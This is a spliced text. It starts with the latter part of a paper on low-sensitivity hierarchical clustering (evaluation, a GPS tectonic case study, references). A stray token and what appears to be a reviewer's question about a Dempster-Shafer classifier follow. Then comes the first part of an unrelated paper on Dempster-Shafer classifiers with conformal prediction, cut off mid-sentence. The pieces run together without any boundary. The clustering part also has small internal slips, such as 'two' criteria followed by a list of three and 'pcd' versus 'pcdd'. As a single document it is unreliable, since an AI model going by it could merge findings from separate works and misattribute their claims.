representatives of divisive clustering, we adopted bisecting 2-means (Jain, 2010) and principal direction divisive partitioning (Boley, 1998). These two methods recursively split data points by using the standard 2-means clustering and the sign of the first principal component, respectively. We implemented these methods, which we denote by 2-means and pcd, by using KMeans in scikit-learn with the number of clusters set to two and ten random initializations and PCA with the number of components set to one, respectively, and default parameters for the other options. --- 1We did not adopt the outlier-robust methods (Eriksson et al., 2011; Balcan et al., 2014; Cheng et al., 2019) because the core of these methods is on identifying outliers, which is irrelevant to the current problem. --- **Table 1: Datasets** | Dataset | Data Size | # of Features | |---------------|-----------|---------------| | breast cancer | 569 | 30 | | diabetes | 442 | 10 | | digits | 1797 | 64 | **Algorithm 4:** Sampling with a low average sensitivity under shared randomness ``` Procedure SAMPLING(p, π) Let σ be a permutation such that \( p_{σ(1)} \leq p_{σ(2)} \leq \cdots \leq p_{σ(n)} \); Let \( q \in \mathbb{R}_+^n \) so that \( q_{σ(i)} = q_{σ(i-1)} + (n-i+1)(p_{σ(i)} - p_{σ(i-1)}) \), where \( p_0 = q_{σ(0)} = 0 \); \( t \leftarrow U([0, 1], π) \) and delete the used bits from \( π \); while true do \( i \leftarrow U(\{1, 2, \ldots, n\}, π) \) and delete the used bits from \( π \); if \( q_i > t \) then break. return \( i \). ``` Evaluation criteria We measure the average sensitivity of hierarchical clustering algorithms as well as their qualities. We evaluated the average sensitivity following [1]. For SHC-SR, we treated SHC-SR(·, α, λ, D, π) with a fixed π as the deterministic algorithm A. As the quality measure, we adopted two popular criteria, Dasgupta score [Dasgupta (2016)], Dendrogram purity [Heller and Ghahramani (2005)] and Cophenetic Correlation [Sokal and Rohlf (1962)]. Dasgupta score measures the quality of a hierarchical clustering T using costs of pairs of data points. More specifically, we define the Dasgupta score of a hierarchical clustering T by \[ \text{score}(T) = \sum_{i,j=1; i \neq j} w(i, j)n(i, j), \] where \( n(i, j) \) denotes the number of data points belonging to the subtree rooted at the lowest common ancestor of nodes that \( x_i \) and \( x_j \) belong to. The Dasgupta score is small when dissimilar points \( x_i \) and \( x_j \) (i.e., \( w(i, j) \) is small) are split into different clusters in a shallow part of the tree, and similar points (i.e., \( w(i, j) \) is large) are split in a deeper part. Thus, a clustering T with smaller \( \text{score}(T) \) is considered ideal. Procedure We generated 10 subsampled datasets of size \( n = 100, 300, \) and 500 from the original dataset.\(^3\) For each subsampled dataset, we constructed a hierarchical clustering using SHC-SR over different values of \( \lambda \) and the baseline methods. As the result, we obtained 10 clusterings for each method. We compute the average of the average sensitivity and the Dasgupta score of these 10 clusterings. We then report the trade-offs of the average of the average sensitivity and the average of the clustering qualities. 7.2 Results Figures 2 shows the results of the experiments with \( n = 100 \). Each figure shows the trade-offs between the average sensitivity and the average Dasgupta score, with the depth of T limited to 10, and with the similarity coefficient \( \alpha \) varied to 1, 3, 10, and 30. The results of the baselines and SHC-SR for several different \( \lambda \) are shown in different symbols and red lines, respectively. We can find that the red lines of SHC-SR tend to lie in the lower left area of the figures. That is, SHC-SR with appropriately chosen \( \lambda \) can attain a good trade-off with small average sensitivity and better Dasgupta scores, as expected. By contrast, all the baselines, except for single, tend to exhibit small Dasgupta scores while incurring high average sensitivity. These methods are therefore good at producing high quality clusterings, while being sensitive to a small perturbation of the dataset. The \(^2\)We show the results for Dendrogram purity and Cophenetic Correlation in Appendix. \(^3\)We show the results for \( n = 300 \) and \( n = 500 \) in Appendix because they are similar to \( n = 100 \). result of single is exceptional, exhibiting large Dasgupta scores with small average sensitivity. We observed that single tends to produce highly unbalanced clusterings because single split the dataset into small and large clusters. Although such a split is less sensitive to the dataset perturbation and has smaller average sensitivity, the quality of clustering is poor. SHC-SR provides a way to balance the quality of the clustering and its average sensitivity by tuning $\lambda$ upon the user demand. 8 APPLICATION TO GPS DATASET We applied SHC-SR and agglomerative algorithms to a real-world problem involving a GPS dataset (Takahashi et al., 2019). This dataset consists of 280 GPS markers in Taiwan, where each data point represents its longitude, latitude, and velocity in the horizontal directions. By applying clustering to the horizontal velocities, we can cluster regions with similar movements and find active tectonic boundaries. The stability of clustering is crucial in this application because if the found clusters change drastically upon removal of a few GPS markers, the clusters may be an artifact induced by unstable clustering algorithms rather than the true tectonic boundaries. Figure 3 shows the clustering results on the GPS dataset over the five trials when randomly chosen 20 out of 280 points are removed from the dataset. Here, we display the four clusters found at the depth two of the obtained hierarchy. The figures show that the agglomerative algorithms (ward, average, complete) tend to produce different clusters over different data removals. By contrast, SHC-SR with $\lambda = 10$, $1000$, and $\infty$ produce almost identical clusters, except the first result on $\lambda = 10$. This result confirms that we can obtain stable clusters by using SHC-SR. 9 CONCLUSIONS In this work, we considered the average sensitivity of hierarchical clustering. We proposed hierarchical clustering algorithms SHC and SHC-SR and theoretically proved that they have low average sensitivity and average sensitivity under shared randomness, respectively. Then using real-world datasets, we empirically confirmed that our algorithm SHC-SR achieves a good trade-off between the quality of the output clustering and average sensitivity. --- 4We omitted single, 2-means, and pcdd because of their poor performances in the previous experiments; single was poor at its clustering quality, 2-means was poor at its average sensitivity, and pcdd tends to be parteo-dominated by other methods. REFERENCES A. Abboud, V. Cohen-Addad, and H. Houdrougé. Subquadratic high-dimensional hierarchical clustering. In *Advances in Neural Information Processing Systems (NeurIPS)*, volume 32, 2019. M. Ackerman and S. Ben-David. A characterization of linkage-based hierarchical clustering. *The Journal of Machine Learning Research*, 17(1):8182–8198, 2016. M. Ackerman, S. Ben-David, S. Brânzei, and D. Loker. Weighted clustering. In *Proceedings of the AAAI Conference on Artificial Intelligence (AAAI)*, volume 26, pages 858–863, 2012. S. Arora, S. Rao, and U. Vazirani. Expander flows, geometric embeddings and graph partitioning. *Journal of the ACM*, 56(2):1–37, 2009. M.-F. Balcan, Y. Liang, and P. Gupta. Robust hierarchical clustering. *The Journal of Machine Learning Research*, 15(1):3831–3871, 2014. D. Boley. Principal direction divisive partitioning. *Data Mining and Knowledge Discovery*, 2:325–344, 1998. M. Charikar and V. Chatziafratis. Approximate hierarchical clustering via sparsest cut and spreading metrics. In *Proceedings of the 28th Annual ACM-SIAM Symposium on Discrete Algorithms (SODA)*, pages 841–854. SIAM, 2017. S. Chawla, R. Krauthgamer, R. Kumar, Y. Rabani, and D. Sivakumar. On the hardness of approximating multicut and sparsest-cut. *Computational Complexity*, 15(2):94–114, 2006. D. Cheng, Q. Zhu, J. Huang, Q. Wu, and L. Yang. A hierarchical clustering algorithm based on noise removal. *International Journal of Machine Learning and Cybernetics*, 10:1591–1602, 2019. S. Dasgupta. A cost function for similarity-based hierarchical clustering. In *Proceedings of the 48th Annual ACM Symposium on Theory of Computing (STOC)*, pages 118–127, 2016. L. Dhulipala, D. Eisenstat, J. Lacki, V. Mirrokni, and J. Shi. Hierarchical agglomerative graph clustering in poly-logarithmic depth. In *Advances in Neural Information Processing Systems (NeurIPS)*, pages 22925–22940, 2022. M. B. Eisen, P. T. Spellman, P. O. Brown, and D. Botstein. Cluster analysis and display of genome-wide expression patterns. *Proceedings of the National Academy of Sciences*, 95(25):14863–14868, 1998. B. Eriksson, G. Dasarathy, A. Singh, and R. Nowak. Active clustering: Robust and efficient hierarchical clustering using adaptively selected similarities. In *Proceedings of the 14th International Conference on Artificial Intelligence and Statistics (AISTATS)*, volume 15, pages 260–268, 2011. L. L. Gao, J. Bien, and D. Witten. Selective inference for hierarchical clustering. *Journal of the American Statistical Association*, pages 1–27, 2022. F. Gilbert, P. Simonetto, F. Zaidi, F. Jourdan, and R. Bourqui. Communities and hierarchical structures in dynamic social networks: analysis and visualization. *Social Network Analysis and Mining*, 1(2):83–95, 2011. S. Hara and Y. Yoshida. Average sensitivity of decision tree learning. In *Proceedings of the 11th International Conference on Learning Representations (ICLR)*, 2023. T. Hastie, R. Tibshirani, J. H. Friedman, and J. H. Friedman. *The elements of statistical learning: data mining, inference, and prediction*, volume 2. Springer, 2009. K. A. Heller and Z. Ghahramani. Bayesian hierarchical clustering. In *Proceedings of the 22nd International Conference on Machine learning (ICML)*, pages 297–304, 2005. A. K. Jain. Data clustering: 50 years beyond K-means. *Pattern Recognition Letters*, 31(8):651–666, 2010.
libLqoInAd
I'm a bit confused as to why the n-dim DS classifier handles epistemic uncertainty better than the softmax classifier, especially as demonstrated in Figure 3. As noted in the text, the n-dim classifier loses the ability to distinguish between aleatoric and epistemic uncertainty (since uncertainty is only able to be measured on the singletons, vs the larger sets). I understand that the softmax classifier would be at least a normalized version of this, but I'm not sure why it would completely switch its predictions in a way that assigns mass to a class completely ignored by the n-dim one (i.e., the {1} set).
Reliable Classifications with Guaranteed Confidence using the Dempster-Shafer Theory of Evidence Anonymous authors Paper under double-blind review Abstract Reliably capturing predictive uncertainty is indispensable for the deployment of machine learning (ML) models in safety-critical domains. The most commonly used approaches to uncertainty quantification are, however, either computationally costly in inference or incapable of capturing different types of uncertainty (i.e., aleatoric and epistemic). In this paper, we tackle this issue using the Dempster-Shafer theory of evidence, which only recently gained attention as a tool to estimate uncertainty in ML. By training a neural network to return a generalized probability measure and combining it with conformal prediction, we obtain set predictions with guaranteed user-specified confidence. We test our method on various datasets and empirically show that it reflects uncertainty more reliably than a calibrated classifier with softmax output, since our approach yields smaller and hence more informative prediction sets at the same bounded error level in particular for samples with high epistemic uncertainty. In order to deal with the exponential scaling inherent to classifiers within Dempster-Shafer theory, we introduce a second approach with reduced complexity, which also returns smaller sets than the comparative method, even on large classification tasks with more than 40 distinct labels. Our results indicate that the proposed methods are promising approaches to obtain reliable and informative predictions in the presence of both aleatoric and epistemic uncertainty in only one forward-pass through the network. 1 Introduction Both scientific and industrial challenges are increasingly addressed using machine learning (ML) methods. There is a growing tendency to employ ML even in scenarios where false predictions can have severe consequences, such as in medical diagnostics or autonomous driving. A major challenge for the development of ML functions in these kinds of applications is the reliability of the underlying model. Besides robustness of the ML module, having an estimate of the predictive uncertainty is an essential component. While common metrics such as accuracy indicate how good a model is on average, they do not provide information about how certain it is for a specific input example. For instance, a pedestrian in traffic most likely doesn’t mind that the autonomous driving module correctly classifies 99% of pedestrians, but fails to classify them and causes an accident. Needless to say, it becomes inevitable to have a measure of uncertainty for each instance that allows for making decisions that control instance-sensitive risk functions. In the instance of the pedestrian, this would, e.g., imply braking whenever the uncertainty of the class “pedestrian” is high. In general, a distinction is drawn between two different sources of uncertainty, namely aleatoric and epistemic (Hüllermeier & Waegeman [2021]). Aleatoric, sometimes also referred to as statistical uncertainty, is associated with an inherent random nature of the information. This includes, for instance, noisy or imprecise data. Epistemic uncertainty, in contrast, stems from a lack of information (ignorance) of the decision maker about the perfect model, which can occur in the ML context due to a non-optimal training or because of an ill-chosen hypothesis space that does not include the perfect model. More data, i.e., information can reduce parts of epistemic uncertainty, but not aleatoric uncertainty, which is why the latter is sometimes also referred to as irreducible uncertainty. Reliable ML methods ought to be capable of distinguishing between aleatoric and epistemic uncertainty for some applications. For example, in active learning the samples of high epistemic uncertainty are leveraged to reduce uncertainty in regions of the feature space in which the model lacks sufficient data (Aggarwal et al., 2014). There are applications, such as autonomous driving, which require fast inference times, as latency in the vehicle should be low. At the same time, such low latency applications may need to run on embedded devices, where computational resources are limited. Many common methods for quantifying aleatoric and epistemic uncertainty require sampling steps or utilize ensembles. For example, Bayesian neural networks sample from the posterior during inference, and an ensemble ML model can easily estimate uncertainty as deviation of predictions between individual ensemble members but multiplies the computational cost by the size of the ensemble. Thus, neither of these methods is suitable to be employed in a low latency setting with limited computational resources. In conclusion, a method that is simultaneously able to estimate aleatoric and epistemic uncertainty while being computationally lean is so far lacking and forms the starting point of our investigations. Contributions. In this work, we introduce a novel approach to quantify predictive uncertainty that combines a neural network classifier based on the Dempster-Shafer theory of evidence (DST) (Dempster, 1967a,b; Shafer, 1976) with conformal prediction (CP) (Vovk et al., 2005; Pappadopoulos et al., 2002; Lei & Wasserman, 2014), yielding reliable set predictions with guaranteed confidence for classification tasks subject to uncertainty in only one forward-pass through the network. Our approach can be adopted to arbitrary network architectures, only requiring to adjust the output layer to match the dimension of the quantities from DST. We construct a loss function that enables our classifier to be informative under different levels of epistemic uncertainty and we show empirically on different datasets that our method returns smaller, i.e., more informative sets than a comparable standard classifier network using a softmax output. Further, we introduce a reduced approach limited to false negative control that does not require an adaptation of the output dimension while still yielding informative set predictions. 2 RELATED WORK In the field of uncertainty quantification in ML, various techniques have emerged to enhance the reliability and robustness of predictive models. This section reviews the state of the art in uncertainty quantification for single-label classification tasks (i.e., where each instance has only one correct label), discussing methods such as Bayesian neural networks (BNNs) (MacKay, 1992) or ensemble methods (Lakshminarayanan et al., 2017) and highlights the recent use of the Dempster-Shafer theory in Deep Learning. A naïve strategy for capturing predictive uncertainty is the probabilistic approach, which involves a prediction of the discrete probability distribution over the different outcomes. Depicted in a probability simplex, this would constitute a point prediction, see Fig. 1(a). While being a reasonable starting point, there are indications that standard probabilistic models are often poorly calibrated (Guo et al., 2017), meaning that their output frequently does not accurately represent the true likelihood of the outcomes. To overcome this issue there exist several calibration methods, among which temperature scaling of the softmax parameter, introduced in Guo et al. (2017), and its extensions (Ji et al., 2019; Yu et al., 2022; Joy et al., 2023) is one of the most prominent post-processing techniques. Moreover, probabilistic approaches come with the drawback of not being able to distinguish between aleatoric and epistemic uncertainty. For certain applications, however, a distinction would be essential, especially when decisions can be rejected or delayed (Chow, 1970), or in active learning scenarios (Aggarwal et al., 2014). More sophisticated techniques, such as BNNs or ensemble methods like Monte Carlo dropout (Gal & Ghahramani, 2016) or Bagging techniques (Breiman, 1996), are commonly used to capture a more accurate estimation of uncertainty in ML models and also allow to draw a distinction between aleatoric and epistemic uncertainty. At the heart of these methods is a distribution over possible sets of neural network parameters which is sampled multiple times for each data point during inference, cf. Fig. 1(b)-(c). The epistemic uncertainty is reflected by the variance of this distribution, while the aleatoric uncertainty is defined by the mean. Although this allows a distinction of the sources of uncertainty, those methods are computationally expensive in inference and therefore not suited for some tasks such as autonomous driving. Figure 1: Probability simplex of three mutually exclusive events, denoted as $A$, $B$ and $C$ for different methods to capture uncertainty: While probabilistic point predictions only reflect aleatoric uncertainty (a), more advanced approaches like ensemble methods provide a measure of epistemic uncertainty in terms of the width of the scatter of the point predictions of multiple ensemble members (b). Similarly, in Bayesian neural networks, the variance of the distribution on the weights captures epistemic uncertainty (c). Yet other approaches, such as DST, provide credal sets whose size represents a measure of epistemic uncertainty (d). Besides the expression of predictive uncertainty via distributions, there is the possibility of a representation via sets (Grycko [1993]). In our work, we make use of such set-valued predictions, i.e., the model outputs a set of possible labels, with the size of the set being an indicator of its certainty. Within this research area there are again two parallel branches. The first one is a pure post-processing method referred to as conformal prediction (Vovk et al. [2005], Shafer & Vovk [2008], Balasubramanian et al. [2014]), where sets with guaranteed confidence levels are returned. Since we use this method in our work, we formally introduce it in Section 3.2. In the second branch, sets are returned directly from the model. A special case of this is the so-called classification with reject option, where a classifier can express its uncertainty by refusing to classify a specific example (Herbei & Wegkamp [2006]). Other approaches, including our work, predict generalized probabilities for all sets of outcomes, which can be used to construct a credal set, cf. Fig. 1(d), defined as a convex set of probability distributions over all outcomes (see also Section 3.1 below), or utilize credal sets as representation of epistemic uncertainty, e.g., (Lienen & Hüllermeier [2021]). To the best of our knowledge, only a few recent works directly make use of Dempster-Shafer theory to obtain set-valued predictions for quantifying predictive uncertainty. There also exists a rich body on belief functions (Cuzzolin [2014]), a connection between belief functions and conformal prediction has recently been found (Cella & Martin [2022]). Directly constructing outputs according to DST, Manchingal et al. [2023] learn feature vectors to fit Gaussian mixture models (GMMs), aiming to obtain a predetermined number of relevant subsets. The ability of GMMs to represent epistemic uncertainty, however, can be questioned, since they represent data density rather than prediction uncertainty. The most directly related work to the approach presented in this paper is that in Manchingal & Cuzzolin [2022]. They propose a neural network that assigns probability values based on the framework of DST to each set of outcomes (i.e., exponentially many values in the number of outcomes) by zero-padding label vectors and standard training. However, as they conclude in their work, this approach is similar to a traditional output in terms of training and validation. Our approach differs from that of Manchingal et al. in that we derive a novel loss function motivated by how uncertainty is represented in DST. Additionally, by modifying the output layer of a common neural network classifier, we are able to solve the scaling problem while still obtaining informative set predictions. 3 PRELIMINARIES The method developed in this work for quantifying predictive uncertainties is based on the Dempster-Shafer theory of evidence, which has only recently made its way into the uncertainty quantification community (Manchingal & Cuzzolin [2022]). Since the principles of DST are not common, they will be explained for completeness in Section 3.1 below. We combine a classifier based on DST with conformal prediction as a post-processing step, which we will elaborate on in Section 3.2. 3.1 Dempster-Shafer Theory of Evidence Dempster-Shafer theory (DST), sometimes also referred to as the theory of evidence or Dempster-Shafer theory of evidence, is a mathematical framework for decision-making in situations where evidence or information is incomplete, imprecise, or conflicting. The fundamental idea is to assign probabilities not to individual outcomes but to sets of outcomes \cite{Dempster1967}, which addresses the limitation of standard Bayesian probability theory: expressing a state of ignorance, i.e., reflecting what you don’t know without the need of committing to a prior. Consider for instance tossing a coin which is known to be fair. One would then assign both outcomes, heads and tails, an equal probability of 0.5. If however, the coin is not known to be fair (and you don’t have any further evidence about it’s state), Bayesian probability theory would still assign a 0.5 probability to both outcomes, whereas DST allows to express the lack of knowledge by assigning a generalized probability (which is called mass function in DST) of 1 to the total set \{heads, tails\} without the attempt to ascribe probabilities to the options fair and not fair. **Definition 1** Consider a so-called frame of discernment \( \Theta = \{X_1, X_2, \ldots, X_n\} \), which is a set of \( n \) mutually exclusive outcomes of the system under consideration. A basic probability assignment over \( \Theta \), hereafter just denoted as mass function \( m \), is a function that assigns a probability to each element in the powerset of \( \Theta \), i.e., \( m : 2^\Theta \rightarrow [0, 1] \) such that the two conditions hold: \[ m(\emptyset) = 0 \\ \sum_{A \subseteq \Theta} m(A) = 1. \] That is, the mass function \( m(A) \) is an expression of how much one believes in precisely the set \( A \) and not in any subset of \( A \). To make further notation easier, we call \( \mathbf{m} = (m(\emptyset), m(\{1\}), \ldots, m(\Theta)) \in \mathbb{R}^{2^n} \) the mass vector. Based on the mass one can derive two other functions over subsets of \( \Theta \), namely belief and plausibility \cite{Shafer1990}. **Definition 2** Let \( m \) be a mass function over \( \Theta \). The belief function \( \text{bel} \) and plausibility function \( \text{pl} \) defined on the elements of the powerset \( 2^\Theta \) induced by \( m \) are defined as \[ \text{bel}(A) = \sum_{B \subseteq A} m(B) \\ \text{pl}(A) = \sum_{B \cap A \neq \emptyset} m(B) = 1 - \text{bel}(\bar{A}) \quad \forall A \subseteq \Theta \] Belief and plausibility fulfill the property \( \text{bel}(A) \leq \text{pl}(A) \) for all \( A \subseteq \Theta \), which is why they are sometimes interpreted as lower and upper probability, respectively, for the particular set of outcomes. Similarly as for the mass function, a plausibility and a belief vector can be defined as \( \mathbf{pl} = (\text{pl}(\emptyset), \text{pl}(\{1\}), \ldots, \text{pl}(\Theta)) \) and \( \mathbf{bel} = (\text{bel}(\emptyset), \text{bel}(\{1\}), \ldots, \text{bel}(\Theta)) \). Note that neither \( \mathbf{pl} \) nor \( \mathbf{bel} \) are necessarily normalized. The plausibility and belief values of the singleton sets in \( 2^\Theta \) define a so-called credal set, which is a convex set of probability distributions over elementary events. The volume of such a convex set can serve as a measure of epistemic uncertainty, cf. Fig. 1(d). That is, once one knows the entire mass vector, an estimate of the epistemic uncertainty can be obtained. Recently, it has been mathematically proven that the volume of a credal set is a reliable measure of epistemic uncertainty only in the binary case \cite{Sale2023}, since the volume is zero in higher dimensions if the credal set is not of full dimensionality (in DST this occurs if plausibility and belief of a singleton are equal). Restricting the considerations to credal sets fully defined by their belief and plausibility bounds, alternative measures of epistemic uncertainty could be defined, which avoid the collapse issue in higher dimensions. For a single-label classifier, e.g., the mean belief-plausibility gap across all singleton sets could be used as a meaningful measure. Note that the presented axiomatic formulation of the Dempster-Shafer theory is the approach in Shafer \cite{Shafer2008}, which is not the only way to roll out DST. In their milestone work \cite{Dempster1967}, Arthur P. Dempster defined mass, belief, and plausibility functions via a multi-valued map. Other routes include compatibility relations \cite{Shafer1987} and random subsets \cite{Nguyen1978}. We refer the interested reader to Shafer \cite{Shafer1990}, where an overview over different formalizations is given. For completeness, we also highlight some criticisms \cite{Zadeh1979, Pearl1988a} and their possible resolutions \cite{Haenni2005, Wilson1992, Yager1987, Smets1992, Fixsen1997}, but we do not utilize these results. 3.2 Conformal Prediction Conformal prediction (CP) provides a general methodology for prediction tasks aimed to obtain instance-wise set predictions with a guaranteed user-specified confidence \cite{Vovk et al., 2005; Papadopoulos et al., 2002; Lei & Wasserman, 2014}. It can be employed as a post-hoc calibration step to modify black-box point prediction schemes to produce reliable uncertainty estimates. Consider a model \( \hat{f} \) fitted to the problem under consideration, which outputs a prediction \( \hat{y} \) from the output space \( Y \) given an input \( x \) from the input space \( X \), i.e., \( \hat{y} = \hat{f}(x) \) for true outcome \( y \). Conformal prediction relies on the prescription of a scoring function \( s \) (often also referred to as a non-conformity measure), which quantifies the extent that the prediction \( \hat{y} \) deviates from the true output \( y \). A common choice of a scoring function for a classifier that outputs softmax scores for each class \( (\hat{f}(x) \in [0,1]^k \text{ for } k \text{ different outcomes}) \) is one minus the softmax output of the true class, i.e., \( s(x,y) = 1 - \hat{f}(x)_y \). It is further assumed that there is access to a held-back calibration dataset \( D = \{z_i = (x_i, y_i)\}_{i=1}^n \) of size \( n \). The objective is then to predict a reliable output for a new test sample \( z_{n+1} = (x_{n+1}, y_{n+1}) \), of which the true output is unknown. For this purpose, the following assumption is made. **Assumption 1** Calibration dataset \( D \) and test sample \( z \) are finitely exchangeable random variables. That is, there exists a joint probability distribution \( p(D,z) \) which is invariant under any permutation \( \pi \) of \( \{1, 2, ..., n + 1\} \), i.e., \[ p(z_1, z_2, ..., z_{n+1}) = p(z_{\pi(1)}, z_{\pi(2)}, ..., z_{\pi(n+1)}). \] Note that the standard assumption in machine learning of independent and identically distributed (i.i.d.) random variables satisfies assumption 1. In order to obtain a set predictor \( \tau(x|D) \) given a calibration dataset \( D \) and a user-specified confidence level \( 1 - \alpha \), where \( \alpha \in (0,1) \) (e.g., \( 1 - \alpha = 0.9 \)) the following three steps need to be made. 1. Compute non-conformity measures for all samples in the calibration set \( D \), resulting in a set of scores \( \{s(z_i)\}_{i=1}^n \). 2. Compute the \( (1 - \alpha) \)-quantile \( Q_{1-\alpha}(\{s(z_i)\}_{i=1}^n) \) on the set of scores. 3. For a new sample \( z_{n+1} = (x_{n+1}, y_{n+1}) \) obtain the set predictor \( \tau(x_{n+1}|D) \) by including all candidate outputs \( y' \in Y \) whose scores \( s(x_{n+1}, y') \) fall below the \( (1 - \alpha) \)-quantile, i.e., \[ \tau(x_{n+1}|D) = \{y' \in Y : s(x_{n+1}, y') \leq Q_{1-\alpha}(\{s(z_i)\}_{i=1}^n)\} \] By following these steps and under Assumption 1, CP guarantees that the set predictor \( \tau(x_{n+1}|D) \) is calibrated, leading to Theorem 1. **Theorem 1** Under Assumption 1, for any confidence level \( \alpha \in (0,1) \) and for any scoring function \( s \), the set predictor in (6) is well-calibrated, i.e., the probability that the true outcome \( y \) for a given \( x \) is contained in the set is larger or equal to \( 1 - \alpha \) \[ p(y \in \tau(x|D)) \geq 1 - \alpha. \] A proof of Theorem 1 can be found in \cite{Vovk et al., 2005}. Since the trivial set \( \tau(x|D) = Y \) is always valid (in the sense that it always contains the true label), the returned set size can be understood as a measure of informativeness of the underlying model \( \hat{f} \), also sometimes denoted as sharpness \cite{Wang et al., 2023}. The average set size obtained via CP can therefore be utilized as a quality measure, i.e., an evaluation metric for set predictors. In addition to the here presented generic approach, several extensions to CP exist in literature, e.g., \cite{Bates et al., 2021} where the authors tackle CP for classification problems in which some mistakes are more severe than others, or the work of \cite{Mortier et al., 2021} where methods of utility maximization and CP are combined to balance between the correctness of the prediction and the set size. In the context of conformal prediction under ambiguous ground truth, it was recently demonstrated in \cite{Stutz et al., 2023} that it is necessary to take uncertainty into account during calibration to obtain valid prediction sets, and they introduce a new calibration procedure that accounts for this uncertainty. 4 METHOD In this section, we develop a method based on DST to capture aleatoric and epistemic uncertainty for classification tasks in ML contexts. Note that recent theoretical results show how a second order model, i.e., a model capturing a distribution of probabilities, is necessary to represent epistemic uncertainty (Bengs et al., 2022) and how a standard training using loss functions without additional assumptions cannot learn epistemic uncertainty (Bengs et al., 2023). By using DST, we fulfill the requirement to utilize a second order model. Using an implicit assumption on the presence of epistemic uncertainty for the loss function design enables us to move beyond the latter restriction. We consider the following learning problem. Given are pairs of i.i.d. samples \((x, y) \in X \times Y\) from a joint probability distribution \(p_{X \times Y}\). We denote with \(x \in X\) an instance from the input space and \(y \in Y\) is called a label from the label space. Further, let \(Y\) be discrete with \(n\) different labels, i.e., \(Y = \{1, \ldots, n\}\). Our method promotes a basic classifier of any kind into a probabilistic set predictor \(\hat{h}: X \rightarrow 2^Y\) that outputs a mass vector from DST, cf. Fig. 2. The function \(\hat{h}\) is expected to have the property that it assigns higher mass to larger sets for instances \(x\) with high epistemic uncertainty. In cases of high aleatoric uncertainty, \(\hat{h}\) should distribute the mass equally among the respective singleton sets related to the uncertainty. For low predictive uncertainty, the correct singleton set for the label \(y\) belonging to the input \(x\) is supposed to have high mass. ![Figure 2: Overview of the general methodology of the DS Classifier. See Fig. 8 in Appendix C for a comparison of both proposed methods.](image) We employ a neural network with arbitrary architecture except for the output layer and interpret the output of the model as mass vector. After training on a suitable loss function, e.g., (6), plausibilities of singleton sets are determined from the mass vectors for all samples in the calibration set. A calibration according to CP is performed on the plausibilities of the singleton sets of the true labels subsequently. The difficulty in finding such a model for realistic use cases is that the true uncertainty is in general unknown, let alone the difficulty of being able to distinguish between aleatoric and epistemic uncertainty. Therefore, we introduce a specific loss function \(L_m\) that uses a trade-off hyperparameter \(\lambda \in [0, 1]\) which, for small (large) values, makes the model tend to put high masses on larger (smaller) sets. Implicitly, this assumes that one is able to estimate how much of the uncertainty should be attributed to aleatoric and epistemic uncertainty during training. While being a strong assumption, we find it relatively unrestrictive in practice and observe improvements without the need to fine-tune \(\lambda\). The loss then takes the form \[ L_m = (1 - \lambda)L_{MSE_0}(\hat{pl}, pl) + \lambda L_{MSE}(bel, bel). \] Here, \(\hat{pl}\) and \(\hat{bel}\) are the plausibility and belief outputs, respectively, that result from the output mass of the model \(\hat{h}\) and are constructed according to eqs. (4) and (5). The vectors \(pl\) and \(bel\) are plausibility and belief vector resulting from the mass vector which has the entire mass on the singleton set defined by the label \(y\), i.e., \(m(\{y\}) = 1\). Note that the mean squared error (MSE) on the plausibility values has a subscript of 0. By this we indicate a small modification of the standard MSE that replaces all negative entries in the difference \(pl - \hat{pl}\) by zero, in order to push more mass on the larger sets if \(\lambda\) is small. We further want to emphasize that the choice of the loss function is not unique, but the one presented here was found to perform well empirically. In Appendix D, we introduce an alternative training strategy. In particular, it should be mentioned that our method, which we denote as Dempster-Shafer (DS) Classifier from now on, is applicable to arbitrary network architectures if the dimension of the output layer is adjusted to match the dimension resulting from DST. The exponential scaling of the output layer ultimately limits the applicability of our method to small classification problems. This scaling has previously been addressed by the use of focal sets (Manchingal et al., 2023), which deliberately constrains the frame of discernment (see Def. 1) to the most relevant parts. Here, we propose a restriction useful for the common case of false negative control by interpreting the outputs of the model as the plausibilities of the singleton sets directly and hence do not need to construct them in a subsequent processing step. The only adjustment to standard models in our second approach is that outputs are not normalized to 1. Instead, we apply a sigmoid function to the output (as opposed to a conventional softmax function). Similarly, for this method, we have constructed a loss function \( L_{pl} \) with hyperparameter \( \lambda \), see eq. (9), that has similar properties as the loss function in (8) (small \( \lambda \) pushes to high plausibilities in all outcomes, large lambda to a high plausibility only for the true outcome). \[ L_{pl} = (1 - \lambda) L_{CE}(\hat{p}_{sgl}, p_{sgl}) + \lambda L_{MSE}(\hat{p}_{sgl}, p_{sgl}). \] We use \( \hat{p}_{sgl} \) to denote the predicted singleton plausibilities, and \( p_{sgl} \) to indicate the one-hot encoded plausibilities, which have a one in the position of the true label and are zero otherwise. Intuitively, the cross entropy loss (CE) pushes more weight to all outcomes as it does not penalize to put more weight to the plausibility of the wrong outcome (they are multiplied by zero due to the one-hot encoding of the label). That is, for \( \lambda = 0 \) the loss function is minimized by all outcomes that predict a plausibility of 1 on the correct singleton set, regardless of the other predicted plausibilities. In particular, the state of maximum uncertainty, i.e., plausibility of 1 on all singletons, minimizes \( L_{pl} \) for \( \lambda = 0 \). Increasing the \( \lambda \)-parameter in favor of the MSE will lead to a more focused prediction with high plausibility only on one singleton set. We refer to this second approach as DS Classifier (n-dimensional) in the following. To retrieve set predictions with guaranteed confidence from the DST quantities, we further apply CP to the the plausibilities of the singleton sets of the true label of the respective sample for both proposed approaches (note that we could do the calibration equivalently on one minus plausibility to match the description in Sec. 3.2). For the standard DS Classifier this implies computing the plausibilities from the mass vector. By calibrating on the plausibilities we achieve a false negative (FN) control, as in the inference stage only those labels are included in the prediction set with a plausibility exceeding the previously determined quantile. Note that while we are only utilizing plausibilities as upper bounds on the probability for FN control here, credal sets are more information rich and may prove useful for controlling diverse risk functions. It should be emphasized that in our second method we lose the ability to distinguish between aleatoric and epistemic uncertainty, although both types can still be implicitly captured by the same modeling assumptions. Correspondingly, we observe similar behavior for false negative control in the numerical experiments in Section 5 for both the n-dimensional and standard DS Classifier. ![Figure 3](image-url) Figure 3: Predicted outputs of the DS Classifier, the n-dimensional DS Classifier and the Softmax Classifier for one illustrative example from the GTSRB dataset without (i.i.d.) and with (o.o.d.) additional noise. The true outcome for this sample is 0. Both DS approaches are more robust under increased epistemic uncertainty for this instance. If a high level of epistemic uncertainty is prevalent during calibration via CP, a model that is incapable of capturing this type of uncertainty can be expected to frequently attribute high probability to incorrect labels. We illustrate this in Fig. 3 where we compare the outputs of the two proposed DS Classifiers with a standard neural network classifier with softmax activation function in the output layer (denoted as Softmax Classifier) for one specific image from the GTSRB dataset. All classifiers are able to correctly classify the unperturbed image (i.i.d. with the training samples). In situations of high epistemic uncertainty, e.g., if the sample is o.o.d. due to 